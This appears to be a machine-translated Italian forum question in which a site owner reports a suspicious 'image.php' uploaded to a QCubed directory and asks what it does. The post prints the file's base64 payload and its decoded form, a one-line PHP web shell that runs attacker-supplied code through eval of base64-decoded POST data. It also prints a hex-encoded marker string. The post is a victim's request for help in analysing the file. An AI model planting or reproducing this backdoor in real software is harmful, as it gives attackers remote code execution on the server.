Ok, ecco cosa ho cercato su google:
Sembra che ci sia un file caricato denominato "image.php" che viene caricato in una directory qcubed.
Quel file image.php contiene il seguente codice Base64:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
decodificati si aggiunge a questo:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
Ricerca per la stringa in output ho trovato vulnerabilità qcubed simillar su altri siti.
Decodifica l'ultima stringa con echo ho ottenuto:
196.231-172.28:ifacermpubmice:afac42eri02
che davvero don`t capire ciò che fa (utilizzando: http://ostermiller.org/calc/encode.html).
Può cortesemente spiegare che cosa, in particolare, di fronte I`m qui? Quale vulnerabilità di sicurezza dovrei indirizzare per risolvere questo problema?
Ho scoperto cosa potrebbe contenere, sembra che assomigli alla struttura del file passwd, dare un'occhiata qui http://www.regatta.cmc.msu.ru/doc/usr/share/man/info/ru_RU/ a_doc_lib/files/aixfiles/passwd.htm, forse questo aiuterà qualcuno. – Gabriel
Hai detto che hai caricato su una directory qcubed. Puoi spiegare cosa intendi con una directory "qcubed"? –
@VaibhavKaushal QCubed è un quadro e la directory qcubed in non-essenziale. – Gabriel